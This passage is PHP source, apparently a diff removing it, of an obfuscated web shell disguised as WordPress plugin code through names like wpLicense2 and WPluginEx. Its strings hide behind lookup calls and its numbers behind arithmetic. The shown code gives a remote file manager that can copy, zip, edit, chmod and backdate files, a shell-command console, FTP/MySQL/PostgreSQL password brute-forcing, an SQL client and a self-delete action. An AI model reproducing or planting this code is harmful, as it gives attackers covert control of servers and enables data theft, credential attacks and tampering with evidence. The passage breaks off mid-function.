- foreach ($_COOKIE[wpLicense2(533) ] as $f) copy_paste($_COOKIE[wpLicense2(534) ], $f, $GLOBALS[wpLicense2(535) ]);
- } elseif ($_COOKIE[wpLicense2(536) ] == wpLicense2(537)) {
- function move_paste($c, $s, $d) {
- if (is_dir($c . $s)) {
- mkdir($d . $s);
- $h = @opendir($c . $s);
- while (($f = @readdir($h)) !== false) if (($f != wpLicense2(538)) and ($f != wpLicense2(539))) copy_paste($c . $s . wpLicense2(540), $f, $d . $s . wpLicense2(541));
- } elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
- }
- foreach ($_COOKIE[wpLicense2(542) ] as $f) @rename($_COOKIE[wpLicense2(543) ] . $f, $GLOBALS[wpLicense2(544) ] . $f);
- } elseif ($_COOKIE[wpLicense2(545) ] == wpLicense2(546)) {
- if (class_exists(wpLicense2(547))) {
- $zip = new ZipArchive();
- if ($zip->open($_POST[wpLicense2(548) ], round(0 + 0.25 + 0.25 + 0.25 + 0.25))) {
- chdir($_COOKIE[wpLicense2(549) ]);
- foreach ($_COOKIE[wpLicense2(550) ] as $f) {
- if ($f == wpLicense2(551)) continue;
- if (@is_file($_COOKIE[wpLicense2(552) ] . $f)) $zip->addFile($_COOKIE[wpLicense2(553) ] . $f, $f);
- elseif (@is_dir($_COOKIE[wpLicense2(554) ] . $f)) {
- $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . wpLicense2(555)));
- foreach ($iterator as $key => $value) {
- $zip->addFile(realpath($key), $key);
- }
- }
- }
- chdir($GLOBALS[wpLicense2(556) ]);
- $zip->close();
- }
- }
- } elseif ($_COOKIE[wpLicense2(557) ] == wpLicense2(558)) {
- if (class_exists(wpLicense2(559))) {
- $zip = new ZipArchive();
- foreach ($_COOKIE[wpLicense2(560) ] as $f) {
- if ($zip->open($_COOKIE[wpLicense2(561) ] . $f)) {
- $zip->extractTo($GLOBALS[wpLicense2(562) ]);
- $zip->close();
- }
- }
- }
- } elseif ($_COOKIE[wpLicense2(563) ] == wpLicense2(564)) {
- chdir($_COOKIE[wpLicense2(565) ]);
- $_COOKIE[wpLicense2(566) ] = array_map(wpLicense2(567), $_COOKIE[wpLicense2(568) ]);
- WPluginEx(wpLicense2(569) . escapeshellarg($_POST[wpLicense2(570) ]) . wpLicense2(571) . implode(wpLicense2(572), $_COOKIE[wpLicense2(573) ]));
- chdir($GLOBALS[wpLicense2(574) ]);
- }
- unset($_COOKIE[wpLicense2(575) ]);
- setcookie(wpLicense2(576), wpLicense2(577), time() - round(0 + 900 + 900 + 900 + 900));
- break;
- default:
- if (!empty($_POST[wpLicense2(578) ])) {
- WPluginsetcookie(wpLicense2(579), $_POST[wpLicense2(580) ]);
- WPluginsetcookie(wpLicense2(581), serialize(@$_POST[wpLicense2(582) ]));
- WPluginsetcookie(wpLicense2(583), @$_POST[wpLicense2(584) ]);
- }
- break;
- }
- }
- WPluginHeader();
- echo wpLicense2(585);
- $dirContent = WPluginScandir(isset($_POST[wpLicense2(586) ]) ? $_POST[wpLicense2(587) ] : $GLOBALS[wpLicense2(588) ]);
- if ($dirContent === false) {
- echo wpLicense2(589);
- WPluginFooter();
- return;
- }
- global $sort;
- $sort = array(wpLicense2(590), round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
- if (!empty($_POST[wpLicense2(591) ])) {
- if (preg_match(wpLicense2(592), $_POST[wpLicense2(593) ], $match)) $sort = array($match[round(0 + 0.25 + 0.25 + 0.25 + 0.25) ], (int)$match[round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4) ]);
- }
- echo wpLicense2(594) . ($sort[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ] ? round(0) : round(0 + 0.5 + 0.5)) . wpLicense2(595) . ($sort[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ] ? round(0) : round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) . wpLicense2(596) . ($sort[round(0 + 0.5 + 0.5) ] ? round(0) : round(0 + 0.25 + 0.25 + 0.25 + 0.25)) . wpLicense2(597) . ($sort[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ] ? round(0) : round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)) . wpLicense2(598);
- $dirs = $files = array();
- $n = count($dirContent);
- for ($i = round(0);$i < $n;$i++) {
- $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
- $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
- $tmp = array(wpLicense2(599) => $dirContent[$i], wpLicense2(600) => $GLOBALS[wpLicense2(601) ] . $dirContent[$i], wpLicense2(602) => date(wpLicense2(603), @filemtime($GLOBALS[wpLicense2(604) ] . $dirContent[$i])), wpLicense2(605) => WPluginPermsColor($GLOBALS[wpLicense2(606) ] . $dirContent[$i]), wpLicense2(607) => @filesize($GLOBALS[wpLicense2(608) ] . $dirContent[$i]), wpLicense2(609) => $ow[wpLicense2(610) ] ? $ow[wpLicense2(611) ] : @fileowner($dirContent[$i]), wpLicense2(612) => $gr[wpLicense2(613) ] ? $gr[wpLicense2(614) ] : @filegroup($dirContent[$i]));
- if (@is_file($GLOBALS[wpLicense2(615) ] . $dirContent[$i])) $files[] = array_merge($tmp, array(wpLicense2(616) => wpLicense2(617)));
- elseif (@is_link($GLOBALS[wpLicense2(618) ] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(wpLicense2(619) => wpLicense2(620), wpLicense2(621) => readlink($tmp[wpLicense2(622) ])));
- elseif (@is_dir($GLOBALS[wpLicense2(623) ] . $dirContent[$i]) && ($dirContent[$i] != wpLicense2(624))) $dirs[] = array_merge($tmp, array(wpLicense2(625) => wpLicense2(626)));
- }
- $GLOBALS[wpLicense2(627) ] = $sort;
- function WPluginCmp($a, $b) {
- if ($GLOBALS[wpLicense2(628) ][round(0) ] != wpLicense2(629)) return strcmp(strtolower($a[$GLOBALS[wpLicense2(630) ][round(0) ]]), strtolower($b[$GLOBALS[wpLicense2(631) ][round(0) ]])) * ($GLOBALS[wpLicense2(632) ][round(0 + 1) ] ? round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) : -round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
- else return (($a[wpLicense2(633) ] < $b[wpLicense2(634) ]) ? -round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) : round(0 + 0.5 + 0.5)) * ($GLOBALS[wpLicense2(635) ][round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ] ? round(0 + 1) : -round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333));
- }
- usort($files, "WPluginCmp");
- usort($dirs, "WPluginCmp");
- $files = array_merge($dirs, $files);
- $l = round(0);
- foreach ($files as $f) {
- echo wpLicense2(636) . ($l ? wpLicense2(637) : wpLicense2(638)) . wpLicense2(639) . urlencode($f[wpLicense2(640) ]) . wpLicense2(641) . (($f[wpLicense2(642) ] == wpLicense2(643)) ? wpLicense2(644) . urlencode($f[wpLicense2(645) ]) . wpLicense2(646) . htmlspecialchars($f[wpLicense2(647) ]) : wpLicense2(648) . $f[wpLicense2(649) ] . wpLicense2(650) . (empty($f[wpLicense2(651) ]) ? wpLicense2(652) : "title='{$f[wpLicense2(653) ]}'") . wpLicense2(654) . htmlspecialchars($f[wpLicense2(655) ]) . wpLicense2(656)) . wpLicense2(657) . (($f[wpLicense2(658) ] == wpLicense2(659)) ? WPluginViewSize($f[wpLicense2(660) ]) : $f[wpLicense2(661) ]) . wpLicense2(662) . $f[wpLicense2(663) ] . wpLicense2(664) . $f[wpLicense2(665) ] . wpLicense2(666) . $f[wpLicense2(667) ] . wpLicense2(668) . urlencode($f[wpLicense2(669) ]) . wpLicense2(670) . $f[wpLicense2(671) ] . wpLicense2(672) . urlencode($f[wpLicense2(673) ]) . wpLicense2(674) . urlencode($f[wpLicense2(675) ]) . wpLicense2(676) . (($f[wpLicense2(677) ] == wpLicense2(678)) ? wpLicense2(679) . urlencode($f[wpLicense2(680) ]) . wpLicense2(681) . urlencode($f[wpLicense2(682) ]) . wpLicense2(683) : wpLicense2(684)) . wpLicense2(685);
- $l = $l ? round(0) : round(0 + 1);
- }
- echo wpLicense2(686) . htmlspecialchars($GLOBALS[wpLicense2(687) ]) . wpLicense2(688) . (isset($_POST[wpLicense2(689) ]) ? $_POST[wpLicense2(690) ] : wpLicense2(691)) . wpLicense2(692);
- if (class_exists(wpLicense2(693))) echo wpLicense2(694);
- echo wpLicense2(695);
- if (!empty($_COOKIE[wpLicense2(696) ]) && @count($_COOKIE[wpLicense2(697) ])) echo wpLicense2(698);
- echo wpLicense2(699);
- if (!empty($_COOKIE[wpLicense2(700) ]) && @count($_COOKIE[wpLicense2(701) ]) && (($_COOKIE[wpLicense2(702) ] == wpLicense2(703)) || ($_COOKIE[wpLicense2(704) ] == wpLicense2(705)))) echo wpLicense2(706) . date(wpLicense2(707)) . wpLicense2(708) . ($_COOKIE[wpLicense2(709) ] == wpLicense2(710) ? wpLicense2(711) : wpLicense2(712)) . wpLicense2(713);
- echo wpLicense2(714);
- WPluginFooter();
- }
- function actionStringTools() {
- if (!function_exists('hex2bin')) {
- function hex2bin($p) {
- return decbin(hexdec($p));
- }
- }
- if (!function_exists('binhex')) {
- function binhex($p) {
- return dechex(bindec($p));
- }
- }
- if (!function_exists('hex2ascii')) {
- function hex2ascii($p) {
- $r = wpLicense2(715);
- for ($i = round(0);$i < strLen($p);$i+= round(0 + 0.5 + 0.5 + 0.5 + 0.5)) {
- $r.= chr(hexdec($p[$i] . $p[$i + round(0 + 0.5 + 0.5) ]));
- }
- return $r;
- }
- }
- if (!function_exists('ascii2hex')) {
- function ascii2hex($p) {
- $r = wpLicense2(716);
- for ($i = round(0);$i < strlen($p);++$i) $r.= sprintf(wpLicense2(717), ord($p[$i]));
- return strtoupper($r);
- }
- }
- if (!function_exists('full_urlencode')) {
- function full_urlencode($p) {
- $r = wpLicense2(718);
- for ($i = round(0);$i < strlen($p);++$i) $r.= wpLicense2(719) . dechex(ord($p[$i]));
- return strtoupper($r);
- }
- }
- $stringTools = array(wpLicense2(720) => wpLicense2(721), wpLicense2(722) => wpLicense2(723), wpLicense2(724) => wpLicense2(725), wpLicense2(726) => wpLicense2(727), wpLicense2(728) => wpLicense2(729), wpLicense2(730) => wpLicense2(731), wpLicense2(732) => wpLicense2(733), wpLicense2(734) => wpLicense2(735), wpLicense2(736) => wpLicense2(737), wpLicense2(738) => wpLicense2(739), wpLicense2(740) => wpLicense2(741), wpLicense2(742) => wpLicense2(743), wpLicense2(744) => wpLicense2(745), wpLicense2(746) => wpLicense2(747), wpLicense2(748) => wpLicense2(749), wpLicense2(750) => wpLicense2(751), wpLicense2(752) => wpLicense2(753), wpLicense2(754) => wpLicense2(755), wpLicense2(756) => wpLicense2(757), wpLicense2(758) => wpLicense2(759), wpLicense2(760) => wpLicense2(761),);
- if (isset($_POST[wpLicense2(762) ])) {
- WPluginsetcookie(md5($_SERVER[wpLicense2(763) ]) . wpLicense2(764), true);
- ob_start();
- if (in_array($_POST[wpLicense2(765) ], $stringTools)) echo $_POST[wpLicense2(766) ]($_POST[wpLicense2(767) ]);
- $temp = wpLicense2(768) . addcslashes(htmlspecialchars(ob_get_clean()), wpLicense2(769)) . wpLicense2(770);
- echo strlen($temp), wpLicense2(771), $temp;
- exit;
- }
- if (empty($_POST[wpLicense2(772) ]) && !empty($_POST[wpLicense2(773) ])) WPluginsetcookie(md5($_SERVER[wpLicense2(774) ]) . wpLicense2(775), round(0));
- WPluginHeader();
- echo wpLicense2(776);
- echo wpLicense2(777);
- foreach ($stringTools as $k => $v) echo wpLicense2(778) . htmlspecialchars($v) . wpLicense2(779) . $k . wpLicense2(780);
- echo wpLicense2(781) . (@$_COOKIE[md5($_SERVER[wpLicense2(782) ]) . wpLicense2(783) ] ? wpLicense2(784) : wpLicense2(785)) . wpLicense2(786) . (empty($_POST[wpLicense2(787) ]) ? wpLicense2(788) : htmlspecialchars(@$_POST[wpLicense2(789) ])) . wpLicense2(790) . (empty($_POST[wpLicense2(791) ]) ? wpLicense2(792) : wpLicense2(793)) . wpLicense2(794);
- if (!empty($_POST[wpLicense2(795) ])) {
- if (in_array($_POST[wpLicense2(796) ], $stringTools)) echo htmlspecialchars($_POST[wpLicense2(797) ]($_POST[wpLicense2(798) ]));
- }
- echo wpLicense2(799) . htmlspecialchars($GLOBALS[wpLicense2(800) ]) . wpLicense2(801);
- function WPluginRecursiveGlob($path) {
- if (substr($path, -round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) != wpLicense2(802)) $path.= wpLicense2(803);
- $paths = @array_unique(@array_merge(@glob($path . $_POST[wpLicense2(804) ]), @glob($path . wpLicense2(805), GLOB_ONLYDIR)));
- if (is_array($paths) && @count($paths)) {
- foreach ($paths as $item) {
- if (@is_dir($item)) {
- if ($path != $item) WPluginRecursiveGlob($item);
- } else {
- if (empty($_POST[wpLicense2(806) ]) || @strpos(file_get_contents($item), $_POST[wpLicense2(807) ]) !== false) echo wpLicense2(808) . urlencode($item) . wpLicense2(809) . htmlspecialchars($item) . wpLicense2(810);
- }
- }
- }
- }
- if (@$_POST[wpLicense2(811) ]) WPluginRecursiveGlob($_POST[wpLicense2(812) ]);
- echo wpLicense2(813);
- WPluginFooter();
- }
- function actionFilesTools() {
- if (isset($_POST[wpLicense2(814) ])) $_POST[wpLicense2(815) ] = urldecode($_POST[wpLicense2(816) ]);
- if (@$_POST[wpLicense2(817) ] == wpLicense2(818)) {
- if (@is_file($_POST[wpLicense2(819) ]) && @is_readable($_POST[wpLicense2(820) ])) {
- ob_start(wpLicense2(821), round(0 + 4096));
- header(wpLicense2(822) . basename($_POST[wpLicense2(823) ]));
- if (function_exists("mime_content_type")) {
- $type = @mime_content_type($_POST[wpLicense2(824) ]);
- header(wpLicense2(825) . $type);
- } else header(wpLicense2(826));
- $fp = @fopen($_POST[wpLicense2(827) ], wpLicense2(828));
- if ($fp) {
- while (!@feof($fp)) echo @fread($fp, round(0 + 512 + 512));
- fclose($fp);
- }
- }
- exit;
- }
- if (@$_POST[wpLicense2(829) ] == wpLicense2(830)) {
- if (!file_exists($_POST[wpLicense2(831) ])) {
- $fp = @fopen($_POST[wpLicense2(832) ], wpLicense2(833));
- if ($fp) {
- $_POST[wpLicense2(834) ] = wpLicense2(835);
- fclose($fp);
- }
- }
- }
- WPluginHeader();
- echo wpLicense2(836);
- if (!file_exists(@$_POST[wpLicense2(837) ])) {
- echo wpLicense2(838);
- WPluginFooter();
- return;
- }
- $uid = @posix_getpwuid(@fileowner($_POST[wpLicense2(839) ]));
- if (!$uid) {
- $uid[wpLicense2(840) ] = @fileowner($_POST[wpLicense2(841) ]);
- $gid[wpLicense2(842) ] = @filegroup($_POST[wpLicense2(843) ]);
- } else $gid = @posix_getgrgid(@filegroup($_POST[wpLicense2(844) ]));
- echo wpLicense2(845) . htmlspecialchars(@basename($_POST[wpLicense2(846) ])) . wpLicense2(847) . (is_file($_POST[wpLicense2(848) ]) ? WPluginViewSize(filesize($_POST[wpLicense2(849) ])) : wpLicense2(850)) . wpLicense2(851) . WPluginPermsColor($_POST[wpLicense2(852) ]) . wpLicense2(853) . $uid[wpLicense2(854) ] . wpLicense2(855) . $gid[wpLicense2(856) ] . wpLicense2(857);
- echo wpLicense2(858) . date(wpLicense2(859), filectime($_POST[wpLicense2(860) ])) . wpLicense2(861) . date(wpLicense2(862), fileatime($_POST[wpLicense2(863) ])) . wpLicense2(864) . date(wpLicense2(865), filemtime($_POST[wpLicense2(866) ])) . wpLicense2(867);
- if (empty($_POST[wpLicense2(868) ])) $_POST[wpLicense2(869) ] = wpLicense2(870);
- if (is_file($_POST[wpLicense2(871) ])) $m = array(wpLicense2(872), wpLicense2(873), wpLicense2(874), wpLicense2(875), wpLicense2(876), wpLicense2(877), wpLicense2(878), wpLicense2(879));
- else $m = array(wpLicense2(880), wpLicense2(881), wpLicense2(882));
- foreach ($m as $v) echo wpLicense2(883) . urlencode($_POST[wpLicense2(884) ]) . wpLicense2(885) . strtolower($v) . wpLicense2(886) . ((strtolower($v) == @$_POST[wpLicense2(887) ]) ? wpLicense2(888) . $v . wpLicense2(889) : $v) . wpLicense2(890);
- echo wpLicense2(891);
- switch ($_POST[wpLicense2(892) ]) {
- case wpLicense2(893):
- echo wpLicense2(894);
- $fp = @fopen($_POST[wpLicense2(895) ], wpLicense2(896));
- if ($fp) {
- while (!@feof($fp)) echo htmlspecialchars(@fread($fp, round(0 + 204.8 + 204.8 + 204.8 + 204.8 + 204.8)));
- @fclose($fp);
- }
- echo wpLicense2(897);
- break;
- case wpLicense2(898):
- if (@is_readable($_POST[wpLicense2(899) ])) {
- echo wpLicense2(900);
- $code = @highlight_file($_POST[wpLicense2(901) ], true);
- echo str_replace(array(wpLicense2(902), wpLicense2(903)), array(wpLicense2(904), wpLicense2(905)), $code) . wpLicense2(906);
- }
- break;
- case wpLicense2(907):
- if (!empty($_POST[wpLicense2(908) ])) {
- $perms = round(0);
- for ($i = strlen($_POST[wpLicense2(909) ]) - round(0 + 0.25 + 0.25 + 0.25 + 0.25);$i >= round(0);--$i) $perms+= (int)$_POST[wpLicense2(910) ][$i] * pow(round(0 + 2 + 2 + 2 + 2), (strlen($_POST[wpLicense2(911) ]) - $i - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)));
- if (!@chmod($_POST[wpLicense2(912) ], $perms)) echo wpLicense2(913);
- }
- clearstatcache();
- echo wpLicense2(914) . urlencode($_POST[wpLicense2(915) ]) . wpLicense2(916) . substr(sprintf(wpLicense2(917), fileperms($_POST[wpLicense2(918) ])), -round(0 + 1.33333333333 + 1.33333333333 + 1.33333333333)) . wpLicense2(919);
- break;
- case wpLicense2(920):
- if (!is_writable($_POST[wpLicense2(921) ])) {
- echo wpLicense2(922);
- break;
- }
- if (!empty($_POST[wpLicense2(923) ])) {
- $time = @filemtime($_POST[wpLicense2(924) ]);
- $_POST[wpLicense2(925) ] = substr($_POST[wpLicense2(926) ], round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2));
- $fp = @fopen($_POST[wpLicense2(927) ], wpLicense2(928));
- if ($fp) {
- @fwrite($fp, $_POST[wpLicense2(929) ]);
- @fclose($fp);
- echo wpLicense2(930);
- @touch($_POST[wpLicense2(931) ], $time, $time);
- }
- }
- echo wpLicense2(932) . urlencode($_POST[wpLicense2(933) ]) . wpLicense2(934);
- $fp = @fopen($_POST[wpLicense2(935) ], wpLicense2(936));
- if ($fp) {
- while (!@feof($fp)) echo htmlspecialchars(@fread($fp, round(0 + 204.8 + 204.8 + 204.8 + 204.8 + 204.8)));
- @fclose($fp);
- }
- echo wpLicense2(937);
- break;
- case wpLicense2(938):
- $c = @file_get_contents($_POST[wpLicense2(939) ]);
- $n = round(0);
- $h = array(wpLicense2(940), wpLicense2(941), wpLicense2(942));
- $len = strlen($c);
- for ($i = round(0);$i < $len;++$i) {
- $h[round(0 + 0.5 + 0.5) ].= sprintf(wpLicense2(943), ord($c[$i])) . wpLicense2(944);
- switch (ord($c[$i])) {
- case round(0):
- $h[round(0 + 2) ].= wpLicense2(945);
- break;
- case round(0 + 1.8 + 1.8 + 1.8 + 1.8 + 1.8):
- $h[round(0 + 1 + 1) ].= wpLicense2(946);
- break;
- case round(0 + 2.5 + 2.5 + 2.5 + 2.5):
- $h[round(0 + 2) ].= wpLicense2(947);
- break;
- case round(0 + 3.25 + 3.25 + 3.25 + 3.25):
- $h[round(0 + 0.666666666667 + 0.666666666667 + 0.666666666667) ].= wpLicense2(948);
- break;
- default:
- $h[round(0 + 1 + 1) ].= $c[$i];
- break;
- }
- $n++;
- if ($n == round(0 + 10.6666666667 + 10.6666666667 + 10.6666666667)) {
- $n = round(0);
- if ($i + round(0 + 0.5 + 0.5) < $len) {
- $h[round(0) ].= sprintf(wpLicense2(949), $i + round(0 + 0.5 + 0.5)) . wpLicense2(950);
- }
- $h[round(0 + 0.25 + 0.25 + 0.25 + 0.25) ].= wpLicense2(951);
- $h[round(0 + 1 + 1) ].= wpLicense2(952);
- }
- }
- echo wpLicense2(953) . $h[round(0) ] . wpLicense2(954) . $h[round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333) ] . wpLicense2(955) . htmlspecialchars($h[round(0 + 0.5 + 0.5 + 0.5 + 0.5) ]) . wpLicense2(956);
- break;
- case wpLicense2(957):
- if (!empty($_POST[wpLicense2(958) ])) {
- if (!@rename($_POST[wpLicense2(959) ], $_POST[wpLicense2(960) ])) echo wpLicense2(961);
- else die(wpLicense2(962) . urlencode($_POST[wpLicense2(963) ]) . wpLicense2(964));
- }
- echo wpLicense2(965) . urlencode($_POST[wpLicense2(966) ]) . wpLicense2(967) . htmlspecialchars($_POST[wpLicense2(968) ]) . wpLicense2(969);
- break;
- case wpLicense2(970):
- if (!empty($_POST[wpLicense2(971) ])) {
- $time = strtotime($_POST[wpLicense2(972) ]);
- if ($time) {
- if (!touch($_POST[wpLicense2(973) ], $time, $time)) echo wpLicense2(974);
- else echo wpLicense2(975);
- } else echo wpLicense2(976);
- }
- clearstatcache();
- echo wpLicense2(977) . urlencode($_POST[wpLicense2(978) ]) . wpLicense2(979) . date(wpLicense2(980), @filemtime($_POST[wpLicense2(981) ])) . wpLicense2(982);
- break;
- }
- echo wpLicense2(983);
- WPluginFooter();
- }
- function actionConsole() {
- if (!empty($_POST[wpLicense2(984) ]) && !empty($_POST[wpLicense2(985) ])) {
- WPluginsetcookie(md5($_SERVER[wpLicense2(986) ]) . wpLicense2(987), true);
- $_POST[wpLicense2(988) ].= wpLicense2(989);
- } elseif (!empty($_POST[wpLicense2(990) ])) WPluginsetcookie(md5($_SERVER[wpLicense2(991) ]) . wpLicense2(992), round(0));
- if (isset($_POST[wpLicense2(993) ])) {
- WPluginsetcookie(md5($_SERVER[wpLicense2(994) ]) . wpLicense2(995), true);
- ob_start();
- echo wpLicense2(996);
- $temp = @iconv($_POST[wpLicense2(997) ], wpLicense2(998), addcslashes(wpLicense2(999) . $_POST[wpLicense2(1000) ] . wpLicense2(1001) . WPluginEx($_POST[wpLicense2(1002) ]), wpLicense2(1003)));
- if (preg_match(wpLicense2(1004), $_POST[wpLicense2(1005) ], $match)) {
- if (@chdir($match[round(0 + 0.25 + 0.25 + 0.25 + 0.25) ])) {
- $GLOBALS[wpLicense2(1006) ] = @getcwd();
- echo wpLicense2(1007) . $GLOBALS[wpLicense2(1008) ] . wpLicense2(1009);
- }
- }
- echo wpLicense2(1010) . $temp . wpLicense2(1011);
- echo wpLicense2(1012);
- $temp = ob_get_clean();
- echo strlen($temp), wpLicense2(1013), $temp;
- exit;
- }
- if (empty($_POST[wpLicense2(1014) ]) && !empty($_POST[wpLicense2(1015) ])) WPluginsetcookie(md5($_SERVER[wpLicense2(1016) ]) . wpLicense2(1017), round(0));
- WPluginHeader();
- echo wpLicense2(1018);
- echo wpLicense2(1019);
- foreach ($GLOBALS[wpLicense2(1020) ] as $n => $v) {
- if ($v == wpLicense2(1021)) {
- echo wpLicense2(1022) . htmlspecialchars($n) . wpLicense2(1023);
- continue;
- }
- echo wpLicense2(1024) . htmlspecialchars($v) . wpLicense2(1025) . $n . wpLicense2(1026);
- }
- echo wpLicense2(1027) . (@$_COOKIE[md5($_SERVER[wpLicense2(1028) ]) . wpLicense2(1029) ] ? wpLicense2(1030) : wpLicense2(1031)) . wpLicense2(1032) . (!empty($_POST[wpLicense2(1033) ]) || $_COOKIE[md5($_SERVER[wpLicense2(1034) ]) . wpLicense2(1035) ] ? wpLicense2(1036) : wpLicense2(1037)) . wpLicense2(1038);
- if (!empty($_POST[wpLicense2(1039) ])) {
- echo htmlspecialchars(wpLicense2(1040) . $_POST[wpLicense2(1041) ] . wpLicense2(1042) . WPluginEx($_POST[wpLicense2(1043) ]));
- }
- echo wpLicense2(1044);
- echo wpLicense2(1045);
- WPluginFooter();
- }
- function actionLogout() {
- setcookie(md5($_SERVER[wpLicense2(1046) ]), wpLicense2(1047), time() - round(0 + 3600));
- die(wpLicense2(1048));
- }
- function actionSelfRemove() {
- if ($_POST[wpLicense2(1049) ] == wpLicense2(1050)) if (@unlink(preg_replace(wpLicense2(1051), wpLicense2(1052), __FILE__))) die(wpLicense2(1053));
- else echo wpLicense2(1054);
- if ($_POST[wpLicense2(1055) ] != wpLicense2(1056)) WPluginHeader();
- echo wpLicense2(1057);
- WPluginFooter();
- }
- function actionBruteforce() {
- WPluginHeader();
- if (isset($_POST[wpLicense2(1058) ])) {
- echo wpLicense2(1059) . htmlspecialchars($_POST[wpLicense2(1060) ]) . wpLicense2(1061) . htmlspecialchars($_POST[wpLicense2(1062) ]) . wpLicense2(1063);
- if ($_POST[wpLicense2(1064) ] == wpLicense2(1065)) {
- function WPluginBruteForce($ip, $port, $login, $pass) {
- $fp = @ftp_connect($ip, $port ? $port : round(0 + 10.5 + 10.5));
- if (!$fp) return false;
- $res = @ftp_login($fp, $login, $pass);
- @ftp_close($fp);
- return $res;
- }
- } elseif ($_POST[wpLicense2(1066) ] == wpLicense2(1067)) {
- function WPluginBruteForce($ip, $port, $login, $pass) {
- $res = @mysql_connect($ip . wpLicense2(1068) . $port ? $port : round(0 + 661.2 + 661.2 + 661.2 + 661.2 + 661.2), $login, $pass);
- @mysql_close($res);
- return $res;
- }
- } elseif ($_POST[wpLicense2(1069) ] == wpLicense2(1070)) {
- function WPluginBruteForce($ip, $port, $login, $pass) {
- $str = wpLicense2(1071) . $ip . wpLicense2(1072) . $port . wpLicense2(1073) . $login . wpLicense2(1074) . $pass . wpLicense2(1075);
- $res = @pg_connect($str);
- @pg_close($res);
- return $res;
- }
- }
- $success = round(0);
- $attempts = round(0);
- $server = explode(wpLicense2(1076), $_POST[wpLicense2(1077) ]);
- if ($_POST[wpLicense2(1078) ] == round(0 + 0.25 + 0.25 + 0.25 + 0.25)) {
- $temp = @file(wpLicense2(1079));
- if (is_array($temp)) foreach ($temp as $line) {
- $line = explode(wpLicense2(1080), $line);
- ++$attempts;
- if (WPluginBruteForce(@$server[round(0) ], @$server[round(0 + 1) ], $line[round(0) ], $line[round(0) ])) {
- $success++;
- echo wpLicense2(1081) . htmlspecialchars($line[round(0) ]) . wpLicense2(1082) . htmlspecialchars($line[round(0) ]) . wpLicense2(1083);
- }
- if (@$_POST[wpLicense2(1084) ]) {
- $tmp = wpLicense2(1085);
- for ($i = strlen($line[round(0) ]) - round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333);$i >= round(0);--$i) $tmp.= $line[round(0) ][$i];
- ++$attempts;
- if (WPluginBruteForce(@$server[round(0) ], @$server[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ], $line[round(0) ], $tmp)) {
- $success++;
- echo wpLicense2(1086) . htmlspecialchars($line[round(0) ]) . wpLicense2(1087) . htmlspecialchars($tmp);
- }
- }
- }
- } elseif ($_POST[wpLicense2(1088) ] == round(0 + 1 + 1)) {
- $temp = @file($_POST[wpLicense2(1089) ]);
- if (is_array($temp)) foreach ($temp as $line) {
- $line = trim($line);
- ++$attempts;
- if (WPluginBruteForce($server[round(0) ], @$server[round(0 + 1) ], $_POST[wpLicense2(1090) ], $line)) {
- $success++;
- echo wpLicense2(1091) . htmlspecialchars($_POST[wpLicense2(1092) ]) . wpLicense2(1093) . htmlspecialchars($line) . wpLicense2(1094);
- }
- }
- }
- echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
- }
- echo wpLicense2(1095) . wpLicense2(1096) . wpLicense2(1097) . htmlspecialchars($GLOBALS[wpLicense2(1098) ]) . wpLicense2(1099) . wpLicense2(1100) . htmlspecialchars($_POST[wpLicense2(1101) ]) . wpLicense2(1102) . wpLicense2(1103) . htmlspecialchars($_POST[wpLicense2(1104) ]) . wpLicense2(1105) . wpLicense2(1106) . wpLicense2(1107) . wpLicense2(1108) . wpLicense2(1109) . wpLicense2(1110) . wpLicense2(1111) . wpLicense2(1112) . wpLicense2(1113) . wpLicense2(1114) . wpLicense2(1115) . htmlspecialchars($GLOBALS[wpLicense2(1116) ]) . wpLicense2(1117) . wpLicense2(1118);
- echo wpLicense2(1119);
- WPluginFooter();
- }
- function actionSql() {
- class DbClass {
- var $type;
- var $link;
- var $res;
- function DbClass($type) {
- $this->type = $type;
- }
- function connect($host, $user, $pass, $dbname) {
- switch ($this->type) {
- case wpLicense2(1120):
- if ($this->link = @mysql_connect($host, $user, $pass, true)) return true;
- break;
- case wpLicense2(1121):
- $host = explode(wpLicense2(1122), $host);
- if (!$host[round(0 + 0.25 + 0.25 + 0.25 + 0.25) ]) $host[round(0 + 0.5 + 0.5) ] = round(0 + 2716 + 2716);
- if ($this->link = @pg_connect("host={$host[round(0) ]} port={$host[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) ]} user=$user password=$pass dbname=$dbname")) return true;
- break;
- }
- return false;
- }
- function selectdb($db) {
- switch ($this->type) {
- case wpLicense2(1123):
- if (@mysql_select_db($db)) return true;
- break;
- }
- return false;
- }
- function query($str) {
- switch ($this->type) {
- case wpLicense2(1124):
- return $this->res = @mysql_query($str);
- break;
- case wpLicense2(1125):
- return $this->res = @pg_query($this->link, $str);
- break;
- }
- return false;
- }
- function fetch() {
- $res = func_num_args() ? func_get_arg(round(0)) : $this->res;
- switch ($this->type) {
- case wpLicense2(1126):
- return @mysql_fetch_assoc($res);
- break;
- case wpLicense2(1127):
- return @pg_fetch_assoc($res);
- break;
- }
- return false;
- }
- function listDbs() {
- switch ($this->type) {
- case wpLicense2(1128):
- return $this->query(wpLicense2(1129));
- break;
- case wpLicense2(1130):
- return $this->res = $this->query(wpLicense2(1131));
- break;
- }
- return false;
- }
- function listTables() {
- switch ($this->type) {
